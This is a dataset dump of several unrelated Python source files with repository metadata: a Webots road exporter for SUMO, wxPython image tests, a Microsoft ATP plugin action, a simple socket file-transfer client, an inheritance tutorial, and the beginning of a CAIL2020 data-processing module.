] | |
291ec277badd9ec84ba46368670827ec4adfb1db | 4da55187c399730f13c5705686f4b9af5d957a3f | /resources/sumo_exporter/road.py | f3fe5331d6efe9f5434c28093515462058cc516f | [
"Apache-2.0"
] | permissive | Ewenwan/webots | 7111c5587100cf35a9993ab923b39b9e364e680a | 6b7b773d20359a4bcf29ad07384c5cf4698d86d3 | refs/heads/master | 2020-04-17T00:23:54.404153 | 2019-01-16T13:58:12 | 2019-01-16T13:58:12 | 166,048,591 | 2 | 0 | Apache-2.0 | 2019-01-16T13:53:50 | 2019-01-16T13:53:50 | null | UTF-8 | Python | false | false | 7,356 | py | """Road class container."""
import math
import re
from re_definitions import floatRE, intRE
from data_structures import grouper
from math_utils import apply_spline_subdivison_to_path
from shapely.geometry import LineString, MultiLineString
from lxml import etree as ET
class Road(object):
"""Class matching with a Webots Road, containing facilities to export to SUMO edges."""
roads = []
def __init__(self, wbtString, roadType):
"""Constructor: Extract info from the wbtString matching the node."""
self.startJunction = None
self.endJunction = None
self.roadType = roadType
try:
self.id = re.findall(r'id\s*"([^"]*)"', wbtString)[0]
except:
self.id = ""
try:
self.width = float(re.findall(r'width\s*(%s)' % floatRE, wbtString)[0])
except:
self.width = 7
try:
self.speedLimit = float(re.findall(r'speedLimit\s*(%s)' % floatRE, wbtString)[0])
except:
self.speedLimit = 50.0 / 3.6 # 50 km/h
try:
self.translation = [float(x) for x in re.findall(r'translation\s*(%s\s*%s\s*%s)' % (floatRE, floatRE, floatRE), wbtString)[0].split()]
except:
self.translation = [0.0, 0.0, 0.0]
try:
self.rotation = [float(x) for x in re.findall(r'rotation\s*(%s\s*%s\s*%s\s*%s)' % (floatRE, floatRE, floatRE, floatRE), wbtString)[0].split()]
except:
self.rotation = [0.0, 1.0, 0.0, 0.0]
try:
self.startJunctionID = re.findall(r'startJunction\s*"([^"]*)"', wbtString)[0]
except:
self.startJunctionID = ""
try:
self.endJunctionID = re.findall(r'endJunction\s*"([^"]*)"', wbtString)[0]
except:
self.endJunctionID = ""
if self.roadType == 'Road':
try:
self.wayPoints = grouper(3, [float(x) for x in re.findall(r'wayPoints\s*\[([^\]]*)\]', wbtString)[0].split()])
except:
self.wayPoints = []
splineSubdivision = 4
try:
splineSubdivision = int(re.findall(r'splineSubdivision\s*(%s)' % intRE, wbtString)[0])
except:
splineSubdivision = 4
if splineSubdivision > 0:
self.wayPoints = apply_spline_subdivison_to_path(self.wayPoints, splineSubdivision)
elif self.roadType == 'StraightRoadSegment':
length = 10.0
try:
length = float(re.findall(r'length\s*(%s)' % floatRE, wbtString)[0])
except:
length = 10.0
self.wayPoints = [[0, 0, 0], [0, 0, length]]
elif self.roadType == 'CurvedRoadSegment':
self.wayPoints = []
subdivision = 8
try:
subdivision = int(re.findall(r'subdivision\s*(%s)' % intRE, wbtString)[0])
except:
subdivision = 8
curvatureRadius = 10.0
try:
curvatureRadius = float(re.findall(r'curvatureRadius\s*(%s)' % floatRE, wbtString)[0])
except:
curvatureRadius = 10.0
totalAngle = 1.5708
try:
totalAngle = float(re.findall(r'totalAngle\s*(%s)' % floatRE, wbtString)[0])
except:
totalAngle = 1.5708
for i in range(subdivision + 1):
x1 = curvatureRadius * math.cos(float(i) * totalAngle / float(subdivision))
y1 = curvatureRadius * math.sin(float(i) * totalAngle / float(subdivision))
self.wayPoints.append([x1, 0, y1])
else:
self.wayPoints = []
try:
self.lanes = int(re.findall(r'numberOfLanes\s*(%s)' % intRE, wbtString)[0])
except:
self.lanes = 2
try:
self.forwardLanes = int(re.findall(r'numberOfForwardLanes\s*(%s)' % intRE, wbtString)[0])
except:
self.forwardLanes = 1
self.backwardLanes = self.lanes - self.forwardLanes
self.oneWay = self.backwardLanes == 0
if self.rotation[0] < 0.01 and self.rotation[2] < 0.01:
angle = self.rotation[3]
if self.rotation[1] > 0:
angle = -angle
for i in range(len(self.wayPoints)):
wayPoint = self.wayPoints[i]
x = math.cos(angle) * wayPoint[0] - math.sin(angle) * wayPoint[2]
y = wayPoint[1]
z = math.cos(angle) * wayPoint[2] + math.sin(angle) * wayPoint[0]
self.wayPoints[i] = [x, y, z]
else:
print ('Warning: cannot export edge "%s" because the road is rotated not only along axis Y.' % self.id)
def create_edge(self, edges):
"""Create the SUMO edge XML node(s) matching with the Webots road."""
if self.startJunctionID == self.endJunctionID:
print ('Warning: cannot export edge "%s" because start and end junctions are identical.' % self.id)
return
if len(self.wayPoints) < 2:
print ('Warning: cannot export edge "%s" because it has less than 2 way-points.' % self.id)
return
laneWidth = self.width / self.lanes
        # The original path should be shifted slightly in the case where the numbers of
        # forward and backward lanes do not match.
originalCoords = [[- x - self.translation[0], z + self.translation[2]] for [x, y, z] in self.wayPoints]
originalLineString = LineString(originalCoords)
if self.oneWay:
originalLineString = originalLineString.parallel_offset(0.5 * laneWidth * self.forwardLanes, 'left')
else:
offset = (self.forwardLanes - self.backwardLanes) * laneWidth * 0.5
if offset > 0.0:
originalLineString = originalLineString.parallel_offset(offset, 'left')
elif offset < 0.0:
originalLineString = originalLineString.parallel_offset(offset, 'left')
originalLineString = LineString(list(originalLineString.coords[::-1]))
if isinstance(originalLineString, MultiLineString):
originalPath = originalCoords
else:
originalPath = list(originalLineString.coords)
# Create the forward edge
if self.forwardLanes > 0:
edge = ET.SubElement(edges, 'edge')
edge.attrib['id'] = self.id
edge.attrib['from'] = self.startJunctionID
edge.attrib['to'] = self.endJunctionID
edge.attrib['numLanes'] = str(self.forwardLanes)
edge.attrib['width'] = str(laneWidth)
edge.attrib['shape'] = Road._pathToString(originalPath)
# Create the backward edge
if self.backwardLanes > 0:
edge = ET.SubElement(edges, 'edge')
edge.attrib['id'] = '-' + self.id
edge.attrib['to'] = self.startJunctionID
edge.attrib['from'] = self.endJunctionID
edge.attrib['numLanes'] = str(self.backwardLanes)
edge.attrib['width'] = str(laneWidth)
edge.attrib['shape'] = Road._pathToString(originalPath[::-1])
@classmethod
def _pathToString(cls, path):
s = ""
for coord in path:
s += "%f,%f " % (coord[0], coord[1])
return s
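# A minimal, hedged usage sketch (module demo): the node string, ids and junction names
# below are invented for illustration; it assumes the patterns from re_definitions accept
# these numeric literals and that shapely and lxml are available, as the imports above
# already require.
if __name__ == '__main__':
    demo_wbt = ('id "R1" width 7.0 numberOfLanes 2 numberOfForwardLanes 1 '
                'length 20.0 startJunction "J_start" endJunction "J_end"')
    demo_road = Road(demo_wbt, 'StraightRoadSegment')
    demo_edges = ET.Element('edges')
    demo_road.create_edge(demo_edges)
    print(ET.tostring(demo_edges, pretty_print=True).decode())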
| [
"[email protected]"
] | |
d42fbc0d64ddce99c3a42871b69a726c42be38af | f8580d2c963b6a3c34e918e0743d0a503a9584bd | /unittests/test_image.py | eb9bc49d20574689e5249f2e3d79f96497b3d369 | [] | no_license | pypy/wxpython-cffi | f59c3faeed26e6a26d0c87f4f659f93e5366af28 | 877b7e6c1b5880517456f1960db370e4bb7f5c90 | refs/heads/master | 2023-07-08T21:13:22.765786 | 2016-12-02T22:10:45 | 2016-12-02T22:10:45 | 397,124,697 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,280 | py | import imp_unittest, unittest
import wtc
import wx
import wx.lib.six as six
from wx.lib.six import BytesIO as FileLikeObject
import os
pngFile = os.path.join(os.path.dirname(__file__), 'toucan.png')
#---------------------------------------------------------------------------
def makeBuf(w, h, bpp=1, init=0):
"Make a simple buffer for testing with"
buf = bytearray([init] * (w*h*bpp))
return buf
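# For example, makeBuf(2, 2, 3) returns a bytearray of 12 zero bytes: one RGB triplet per
# pixel of a 2x2 image, laid out row-major, which is how the tests below feed wx.Image.SetData().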
class image_Tests(wtc.WidgetTestCase):
def test_imageCtor1(self):
img = wx.Image()
self.assertTrue(not img.IsOk())
img.Create(100,100)
self.assertTrue(img.IsOk())
def test_imageCtor2(self):
img = wx.Image(100,100)
self.assertTrue(img.IsOk())
def test_imageCtor3(self):
img = wx.Image(wx.Size(100,100))
self.assertTrue(img.IsOk())
img = wx.Image((100,100))
self.assertTrue(img.IsOk())
def test_imageCtor4(self):
w = h = 10
buf = makeBuf(w,h,3)
img = wx.Image(w, h, buf)
self.assertTrue(img.IsOk())
def test_imageCtor5(self):
w = h = 10
buf = makeBuf(w,h,3)
alpha = makeBuf(w,h)
img = wx.Image(w, h, buf, alpha)
self.assertTrue(img.IsOk())
def test_imageCtor4b(self):
w = h = 10
buf = makeBuf(w,h,3)
img = wx.Image((w, h), buf)
self.assertTrue(img.IsOk())
def test_imageCtor4c(self):
w = h = 10
buf = makeBuf(w,h,3)
with self.assertRaises(ValueError):
# should be an exception here because the buffer is the wrong size
img = wx.Image((w, h+1), buf)
def test_imageCtor5b(self):
w = h = 10
buf = makeBuf(w,h,3)
alpha = makeBuf(w,h)
img = wx.Image((w, h), buf, alpha)
self.assertTrue(img.IsOk())
def test_imageCtor6(self):
img = wx.Image(pngFile, wx.BITMAP_TYPE_PNG)
self.assertTrue(img.IsOk())
def test_imageCtor7(self):
img = wx.Image(pngFile, 'image/png')
self.assertTrue(img.IsOk())
def test_imageCtor8(self):
with open(pngFile, 'rb') as f:
data = f.read()
stream = FileLikeObject(data)
img = wx.Image(stream, wx.BITMAP_TYPE_PNG)
self.assertTrue(img.IsOk())
def test_imageCtor9(self):
with open(pngFile, 'rb') as f:
data = f.read()
stream = FileLikeObject(data)
img = wx.Image(stream, 'image/png')
self.assertTrue(img.IsOk())
def test_imageSetData1(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h,3, init=2)
img.SetData(buf)
self.assertTrue(img.IsOk())
self.assertTrue(img.GetRed(1,1) == 2)
def test_imageSetData2(self):
w = h = 10
img = wx.Image(1,1)
buf = makeBuf(w,h,3, init=2)
img.SetData(buf, w, h)
self.assertTrue(img.IsOk())
self.assertTrue(img.GetRed(1,1) == 2)
def test_imageSetAlpha1(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h, init=2)
img.SetAlpha(buf)
self.assertTrue(img.IsOk())
self.assertTrue(img.GetRed(1,1) == 0)
self.assertTrue(img.GetAlpha(1,1) == 2)
def test_imageGetData(self):
img = wx.Image(pngFile)
data = img.GetData()
self.assertEqual(len(data), img.Width * img.Height * 3)
self.assertTrue(isinstance(data, bytearray))
def test_imageGetAlpha(self):
img = wx.Image(pngFile)
data = img.GetAlpha()
self.assertEqual(len(data), img.Width * img.Height)
self.assertTrue(isinstance(data, bytearray))
def test_imageGetDataBuffer(self):
w = h = 10
img = wx.Image(w, h)
self.assertTrue(img.IsOk())
data = img.GetDataBuffer()
self.assertTrue(isinstance(data, memoryview))
data[0] = 1 if six.PY33 else b'\1'
data[1] = 2 if six.PY33 else b'\2'
data[2] = 3 if six.PY33 else b'\3'
self.assertEqual(1, img.GetRed(0,0))
self.assertEqual(2, img.GetGreen(0,0))
self.assertEqual(3, img.GetBlue(0,0))
def test_imageGetAlphaDataBuffer(self):
w = h = 10
img = wx.Image(w, h)
img.InitAlpha()
self.assertTrue(img.IsOk())
data = img.GetAlphaBuffer()
self.assertTrue(isinstance(data, memoryview))
data[0] = 1 if six.PY33 else b'\1'
data[1] = 2 if six.PY33 else b'\2'
data[2] = 3 if six.PY33 else b'\3'
self.assertEqual(1, img.GetAlpha(0,0))
self.assertEqual(2, img.GetAlpha(1,0))
self.assertEqual(3, img.GetAlpha(2,0))
def test_imageSetDataBuffer1(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h,3)
img.SetDataBuffer(buf)
buf[0] = 1
buf[1] = 2
buf[2] = 3
self.assertEqual(1, img.GetRed(0,0))
self.assertEqual(2, img.GetGreen(0,0))
self.assertEqual(3, img.GetBlue(0,0))
def test_imageSetDataBuffer2(self):
w = h = 10
img = wx.Image(1,1)
buf = makeBuf(w,h,3)
img.SetDataBuffer(buf, w, h)
buf[0] = 1
buf[1] = 2
buf[2] = 3
self.assertEqual(1, img.GetRed(0,0))
self.assertEqual(2, img.GetGreen(0,0))
self.assertEqual(3, img.GetBlue(0,0))
def test_imageSetAlphaBuffer(self):
w = h = 10
img = wx.Image(w,h)
buf = makeBuf(w,h)
img.SetAlphaBuffer(buf)
buf[0] = 1
buf[1] = 2
buf[2] = 3
self.assertEqual(1, img.GetAlpha(0,0))
self.assertEqual(2, img.GetAlpha(1,0))
self.assertEqual(3, img.GetAlpha(2,0))
def test_imageNestedClasses(self):
rgb = wx.Image.RGBValue(1,2,3)
self.assertEqual(rgb.red, 1)
self.assertEqual(rgb.green, 2)
self.assertEqual(rgb.blue, 3)
rgb.red = 4
rgb.green = 5
rgb.blue = 6
hsv = wx.Image.HSVValue(1.1, 1.2, 1.3)
self.assertEqual(hsv.hue, 1.1)
self.assertEqual(hsv.saturation, 1.2)
self.assertEqual(hsv.value, 1.3)
hsv.hue = 2.1
hsv.saturation = 2.2
hsv.value = 2.3
def test_imageRGBHSV(self):
rgb = wx.Image.RGBValue(1,2,3)
hsv = wx.Image.RGBtoHSV(rgb)
rgb = wx.Image.HSVtoRGB(hsv)
self.assertEqual(rgb.red, 1)
self.assertEqual(rgb.green, 2)
self.assertEqual(rgb.blue, 3)
def test_imageProperties(self):
img = wx.Image(pngFile)
self.assertTrue(img.IsOk())
img.Width
img.Height
img.MaskRed
img.MaskGreen
img.MaskBlue
img.Type
def test_imageMethodChain(self):
img = wx.Image(100,100).Rescale(75,75).Resize((100,100), (0,0), 40,60,80)
self.assertTrue(img.IsOk())
def test_imageOtherStuff(self):
img = wx.Image(pngFile)
self.assertTrue(img.IsOk())
r, g, b = img.FindFirstUnusedColour()
r, g, b = img.GetOrFindMaskColour()
#---------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
656dc7e15b78455cee914cb74a92048e94167263 | 9d64a438cdfe4f3feb54f2f0dc7431139c4b9fb9 | /microsoft_atp/komand_microsoft_atp/actions/get_machine_information/action.py | 1d683811c0eb693aaf72cbf02b4acadd6d9b841d | [
"MIT"
] | permissive | PhilippBehmer/insightconnect-plugins | 5ad86faaccc86f2f4ed98f7e5d518e74dddb7b91 | 9195ddffc575bbca758180473d2eb392e7db517c | refs/heads/master | 2021-07-25T02:13:08.184301 | 2021-01-19T22:51:35 | 2021-01-19T22:51:35 | 239,746,770 | 0 | 0 | MIT | 2020-02-11T11:34:52 | 2020-02-11T11:34:51 | null | UTF-8 | Python | false | false | 955 | py | import insightconnect_plugin_runtime
from .schema import GetMachineInformationInput, GetMachineInformationOutput, Input, Output, Component
# Custom imports below
class GetMachineInformation(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='get_machine_information',
description=Component.DESCRIPTION,
input=GetMachineInformationInput(),
output=GetMachineInformationOutput())
def run(self, params={}):
self.logger.info("Running...")
machine_id = self.connection.client.find_first_machine(params.get(Input.MACHINE)).get("id")
self.logger.info(f"Attempting to get information for machine ID: {machine_id}")
return {
Output.MACHINE: insightconnect_plugin_runtime.helper.clean(
self.connection.client.get_machine_information(machine_id)
)
}
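# Note on the flow in run() above: the free-form machine identifier from the input is first
# resolved to a machine ID via the connection client's find_first_machine(), the machine
# record is fetched with get_machine_information(), and the result is passed through
# insightconnect_plugin_runtime.helper.clean() before being returned under the MACHINE key.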
| [
"[email protected]"
] | |
22ab57b357e0f71a237346053a156a4c9b1a6648 | 0cbc02dd7d1efbe61de04dcf1c6eccb6496bf074 | /month02/day10_IO并发/test/test02.py | b855c217d0302b1d40a8a9fe16af35d0418e9f28 | [] | no_license | fsym-fs/Python_AID | 0b1755c15e20b214940041e81bedb2d5ec99e3f9 | f806bb02cdb1670cfbea6e57846abddf3972b73b | refs/heads/master | 2021-03-20T06:57:45.441245 | 2020-05-27T14:13:45 | 2020-05-27T14:13:45 | 247,187,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,359 | py | import socket
import os
import time
class MySocket:
ADDR = ("127.0.0.1", 23456)
def __init__(self):
self.__socketfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.__socketfd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
        # connect to the server
try:
self.__socketfd.connect(self.ADDR)
except:
print("连接服务端出错!")
@property
def socketfd(self):
return self.__socketfd
class ClientController:
def __init__(self, c_socket, name="", file="", id=0):
self.id = id
self.name = name
self.file = file
self.socketfd = c_socket.socketfd
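    # Plain-text request protocol used against the server (inferred from the methods below;
    # the server side is not part of this file, so the exact reply wording is an assumption):
    #   "R <name> <pwd>"  register   -> "OK <msg>" / "FAIL <msg>"
    #   "L <name> <pwd>"  login      -> "OK <user_id>" / "FAIL <msg>"
    #   "Q"               quit       -> "OK" / "FAIL <msg>"
    #   "F"               list files -> "OK <listing>" / "FAIL <msg>"
    #   "D <file_name>"   download   -> "OK ...", then raw bytes terminated by b"FINISH" (or b"FAIL")
    #   "U <file_name>"   upload     -> "OK ...", then the client streams bytes and ends with b"FINISH"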
    def register(self, name, pwd):
        """
        Send a user registration request.
        Args:
            name: user name
            pwd: password
        Returns: registration result: None or (register_status, msg)
        """
data = "R " + name + " " + pwd
self.socketfd.send(data.encode())
data = self.socketfd.recv(1024)
return ClientController.format_data_from_server(data)
    def login(self, name, pwd):
        """
        Log the user in.
        Args:
            name: user name
            pwd: password
        Returns: login result: None or (login_status, msg)
        """
data = "L " + name + " " + pwd
self.socketfd.send(data.encode())
data = ClientController.format_data_from_server(self.socketfd.recv(1024))
        # update client-side state: start
if data and data[0]:
self.name = name
self.pwd = pwd
self.id = data[1]
self.file = "./" + self.name
ClientController.make_dir(self.file)
data[1] = "登录成功"
        # update client-side state: end
return data
    def quit(self):
        """
        Log out.
        Returns: None or [True/False, msg]
        """
self.socketfd.send(b"Q")
data = ClientController.format_data_from_server(self.socketfd.recv(1024))
if data and data[0]:
self.socketfd.close()
return data
    def find_file(self):
        """
        List the files stored on the server.
        Returns: None or [True/False, msg]
        """
data = "F"
self.socketfd.send(data.encode())
data = self.socketfd.recv(1024)
return ClientController.format_data_from_server(data)
    def download_file(self, file_name, show_progress):
        """
        Download the given file from the server.
        Args:
            file_name: name of the file to download from the server
            show_progress: callback used to report download progress
        Returns: download result => None or [True/False, msg]
        """
if not file_name:
return [False, "文件名不能为空"]
dir = self.file + "/" + file_name
        # request the download
        data = "D " + file_name
        self.socketfd.send(data.encode())
        # server's reply: is the download allowed?
        data = ClientController.format_data_from_server(self.socketfd.recv(128))
        if data and data[0]:
            # make sure the local folder exists
            ClientController.make_dir(self.file)
            # stream the new file to disk
with open(dir, "wb") as new_file:
while True:
data = self.socketfd.recv(1024)
if not data:
return [False, "异常终止"]
elif data == b"FAIL":
return [False, "无该文件"]
elif data == b"FINISH":
show_progress([True, dir + ":下载完成"])
return [True, dir + ":下载完成"]
else:
new_file.write(data)
new_file.flush()
show_progress([True, dir + ":下载中..."])
    def upload_file(self, file, show_progress):
        """
        Upload a local file to the server.
        Args:
            file: path of the local file to upload
            show_progress: callback used to report upload progress
        Returns: upload result => None or [True/False, msg]
        """
if not file:
return [False, "待上传文件的路径不能为空"]
if not os.path.exists(file):
return [False, file + ":不存在,无法上传!"]
        # ask the server to accept the upload
        self.socketfd.send(b"U " + file.split("/")[-1].encode())
        data = ClientController.format_data_from_server(self.socketfd.recv(128))
        # consecutive sends follow: use a short sleep so the control message is not glued to the data (TCP sticky packets)
        time.sleep(0.1)
        # server's reply: is the upload allowed?
if data and data[0]:
with open(file, "rb") as f:
while True:
data = f.read(1024)
if not data:
time.sleep(0.1)
self.socketfd.send(b"FINISH")
show_progress([True, file + ":上传完成"])
return [True, file + ":上传完成"]
else:
self.socketfd.send(data)
show_progress([True, file + ":上传中..."])
@staticmethod
def make_dir(name):
if not name: return None
dir = "./" + name
if os.path.exists(dir): return None
os.mkdir("./" + name)
@staticmethod
    def format_data_from_server(data):
        """
        Normalize data received from the server.
        Args:
            data: raw server response
        Returns: the bytes themselves if this is a file stream; for a plain
                 "<status> <msg>" response, returns [True/False, msg]
        """
if not data:
return data
try:
result = data.decode()
except:
result = None
else:
result=result.split(" ",1)
if result and result[0] in "OK FAIL":
return [True if result[0] == "OK" else False, "" if len(result)<2 else result[1]]
else:
return data
class ClientView:
def __init__(self):
self.__init_view()
def __init_view(self):
self.my_socket = MySocket()
self.client_mgr = ClientController(self.my_socket)
    def __register(self):
        """Register a new account (prompts for a user name and matching passwords)."""
name = pwd = repwd = ""
while not name:
name = input("请输入帐号名:")
while not pwd or not repwd or pwd != repwd:
pwd = input("请输入帐号密码:")
repwd = input("请再次输入帐号密码:")
            if pwd != repwd:
print("两次密码不一致,请重新输入")
data = self.client_mgr.register(name, pwd)
if data:
print(data[1])
    def __login(self):
        """Log in with a user name and password."""
name = pwd = ""
while not name:
name = input("请输入帐号名:")
while not pwd:
pwd = input("请输入帐号密码:")
data = self.client_mgr.login(name, pwd)
if data:
print(data[1])
if data[0]:
self.__display_menu()
    def __quit(self):
        """Log out and close the connection."""
data = self.client_mgr.quit()
if data:
print(data[-1])
return data[0]
    def __find_file(self):
        """List the files available on the server."""
data = self.client_mgr.find_file()
if data:
print(data[1])
    def __download_file(self):
        """Download a file from the server."""
file_name = input("请输入需要下载的文件(例如:xxx.txt): ")
data = self.client_mgr.download_file(file_name, self.__show_progress)
if data and not data[0]:
print(data[1])
    def __upload_file(self):
        """Upload a local file to the server."""
file_name = input("请输入待上传文件的路径:")
data = self.client_mgr.upload_file(file_name, self.__show_progress)
if data and not data[0]:
print(data[1])
    def __show_progress(self, data):
        """Print transfer progress."""
if data and data[0]:
print(data[1])
@staticmethod
    def input_number(tip):
        """
        Utility: keep prompting until the user enters an integer.
        Args:
            tip: prompt text shown to the user
        Returns: the integer entered
        """
while True:
try:
num = int(input(tip))
except:
continue
return num
    def main(self):
        """Top-level menu: register / log in / close."""
while True:
print("1)注册")
print("2)登录")
print("3)关闭")
index = ClientView.input_number("请输入选项数字:")
if index == 1:
self.__register()
elif index == 2:
self.__login()
elif index == 3:
break
def __display_menu(self):
while True:
print("1)查看文件")
print("2)下载文件")
print("3)上传文件")
print("4)退出登陆")
index = ClientView.input_number("请输入选项数字:")
if index == 1:
self.__find_file()
elif index == 2:
self.__download_file()
elif index == 3:
self.__upload_file()
elif index == 4:
if self.__quit():
self.__init_view()
break
if __name__ == '__main__':
ftp_client_view = ClientView()
ftp_client_view.main() | [
"[email protected]"
] | |
5cd8e84f11d2ea34f343ae402d5c0b33dcf7d2db | 958d87cc3b77bb3308d0aa04b92fdef5f97d63ae | /4.OOPS/InheritanceAndPolymorphism.py | 8056a618b0d68087183a3df5858998b9bc487e65 | [] | no_license | parihar08/PythonJosePortilla | 6dec83519af78451c46e323928aedf19dbd908f1 | 6f47291908ad05daf5a505ba0e13687c46651bc2 | refs/heads/master | 2022-12-19T07:30:39.603468 | 2020-09-19T14:56:36 | 2020-09-19T14:56:36 | 292,650,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,005 | py | class Animal():
def __init__(self):
print('ANIMAL CREATED')
def who_am_i(self):
print("I am an animal")
def eat(self):
print("I am eating")
# myanimal = Animal()
# myanimal.who_am_i()
# myanimal.who_am_i()
class Dog(Animal):
def __init__(self):
Animal.__init__(self) #Create instance of Animal class when we create instance of Dog class
print('DOG CREATED')
#METHOD OVERRIDE
def who_am_i(self):
print("I am a Dog")
#ADDITIONAL METHODS
def bark(self):
print('WOOF!')
mydog = Dog()
print('*********************************************')
mydog.who_am_i()
mydog.bark()
mydog.eat()
print('*******************POLYMORPHISM**************************')
#Different object classes can share the same method name
class Dog1():
def __init__(self,name):
self.name = name
def speak(self):
return self.name + " says WOOF!"
class Cat1():
def __init__(self,name):
self.name = name
def speak(self):
return self.name + " says MEOW!"
niko = Dog1('niko')
felix = Cat1('felix')
print(niko.speak())
print(felix.speak())
print('*********************************************')
# Here both the Dog1 and Cat1 classes have a speak() method
for pet in [niko,felix]:
print(type(pet))
print(pet.speak())
print('*********************************************')
def pet_speak(pet):
print(pet.speak())
pet_speak(niko)
pet_speak(felix)
print('*******************ABSTRACT CLASSES & INHERITANCE**************************')
class Animal2():
def __init__(self,name):
self.name = name
def speak(self):
raise NotImplementedError('SubClass must implement this abstract method!!')
#myanimal = Animal2('fred')
class Dog2(Animal2):
def speak(self):
return self.name + " says WOOF!"
class Cat2(Animal2):
def speak(self):
return self.name + " says MEOW!"
fido = Dog2('Fido')
isis = Cat2('Isis')
print(fido.speak())
print(isis.speak())
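# For comparison, a minimal sketch of the same abstract-class idea using the standard
# library's abc module (kept as a comment so this tutorial script's output is unchanged;
# the class name AbstractAnimal is made up for the example):
# from abc import ABC, abstractmethod
# class AbstractAnimal(ABC):
#     def __init__(self, name):
#         self.name = name
#     @abstractmethod
#     def speak(self):
#         ...
# Subclasses must override speak(); instantiating AbstractAnimal directly raises TypeError.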
| [
"[email protected]"
] | |
3d31f9d19bdc8592287891bd2f4f8425acbdbd17 | 7ce2b2000cfefe8fbefc2271ebc7df2061c88194 | /CAIL2020/ydljz(hong)/data.py | 9e4c92f039a17554e02061223f80e2403193f7fd | [
"Apache-2.0"
] | permissive | generalzgd/CAIL | f06d79acf42ac2188938c02087f7d07b9b43095c | 57529e64ee2f602324a500ff9bed660ddcde10bb | refs/heads/master | 2023-01-24T01:14:05.382525 | 2020-11-20T03:40:47 | 2020-11-20T03:40:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,128 | py | """Data processor for SMP-CAIL2020-Argmine.
Author: Yixu GAO ([email protected])
In the data file, each line contains 1 sc sentence and 5 bc sentences.
The data processor converts each line into 5 samples,
each sample with 1 sc sentence and 1 bc sentence.
Usage:
1. Tokenizer (used for RNN model):
from data import Tokenizer
vocab_file = 'vocab.txt'
sentence = '我饿了,想吃东西了。'
tokenizer = Tokenizer(vocab_file)
tokens = tokenizer.tokenize(sentence)
# ['我', '饿', '了', ',', '想', '吃', '东西', '了', '。']
ids = tokenizer.convert_tokens_to_ids(tokens)
2. Data:
from data import Data
# For training, load train and valid set
# For BERT model
data = Data('model/bert/vocab.txt', model_type='bert')
datasets = data.load_train_and_valid_files(
'SMP-CAIL2020-train.csv', 'SMP-CAIL2020-valid.csv')
train_set, valid_set_train, valid_set_valid = datasets
# For RNN model
data = Data('model/rnn/vocab.txt', model_type='rnn')
        datasets = data.load_train_and_valid_files(
'SMP-CAIL2020-train.csv', 'SMP-CAIL2020-valid.csv')
train_set, valid_set_train, valid_set_valid = datasets
# For testing, load test set
data = Data('model/bert/vocab.txt', model_type='bert')
test_set = data.load_file('SMP-CAIL2020-test.csv', train=False)
"""
import json
from typing import List
import jieba
import torch
import pandas as pd
from torch.utils.data import TensorDataset
from transformers import BertTokenizer
# from pytorch_pretrained_bert import BertTokenizer
from tqdm import tqdm
max_support_sents = 45
class Tokenizer:
"""Tokenizer for Chinese given vocab.txt.
Attributes:
dictionary: Dict[str, int], {<word>: <index>}
"""
def __init__(self, vocab_file='vocab.txt'):
"""Initialize and build dictionary.
Args:
vocab_file: one word each line
"""
self.dictionary = {'[PAD]': 0, '[UNK]': 1}
count = 2
with open(vocab_file, encoding='utf-8') as fin:
for line in fin:
word = line.strip()
self.dictionary[word] = count
count += 1
def __len__(self):
return len(self.dictionary)
@staticmethod
def tokenize(sentence: str) -> List[str]:
"""Cut words for a sentence.
Args:
sentence: sentence
Returns:
words list
"""
return jieba.lcut(sentence)
def convert_tokens_to_ids(
self, tokens_list: List[str]) -> List[int]:
"""Convert tokens to ids.
Args:
tokens_list: word list
Returns:
index list
"""
return [self.dictionary.get(w, 1) for w in tokens_list]
class Example(object):
def __init__(self,
qas_id,
qas_type,
doc_tokens,
question_text,
sent_num,
sent_names,
sup_fact_id,
para_start_end_position,
sent_start_end_position,
entity_start_end_position,
orig_answer_text=None,
start_position=None,
end_position=None):
self.qas_id = qas_id
self.qas_type = qas_type
self.doc_tokens = doc_tokens
self.question_text = question_text
self.sent_num = sent_num
self.sent_names = sent_names
self.sup_fact_id = sup_fact_id
self.para_start_end_position = para_start_end_position
self.sent_start_end_position = sent_start_end_position
self.entity_start_end_position = entity_start_end_position
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
qas_id,
doc_tokens,
doc_input_ids,
doc_input_mask,
doc_segment_ids,
query_tokens,
query_input_ids,
query_input_mask,
query_segment_ids,
sent_spans,
sup_fact_ids,
ans_type,
token_to_orig_map,
start_position=None,
end_position=None):
self.qas_id = qas_id
self.doc_tokens = doc_tokens
self.doc_input_ids = doc_input_ids
self.doc_input_mask = doc_input_mask
self.doc_segment_ids = doc_segment_ids
self.query_tokens = query_tokens
self.query_input_ids = query_input_ids
self.query_input_mask = query_input_mask
self.query_segment_ids = query_segment_ids
self.sent_spans = sent_spans
self.sup_fact_ids = sup_fact_ids
self.ans_type = ans_type
self.token_to_orig_map=token_to_orig_map
self.start_position = start_position
self.end_position = end_position
def get_valid_spans(spans, limit):
new_spans = []
for span in spans:
if span[1] < limit:
new_spans.append(span)
else:
new_span = list(span)
new_span[1] = limit - 1
new_spans.append(tuple(new_span))
break
return new_spans
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return new_start, new_end
return input_start, input_end
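# Worked example for _improve_answer_span (values are illustrative, not from the dataset):
# with whitespace tokens ["The", "leader", "was", "John", "Smith", "(1895-1943)"] and the
# annotated answer "1895", the character-based span can end up covering the whole sub-token
# range of "(1895-1943)". Scanning every sub-range for an exact match of
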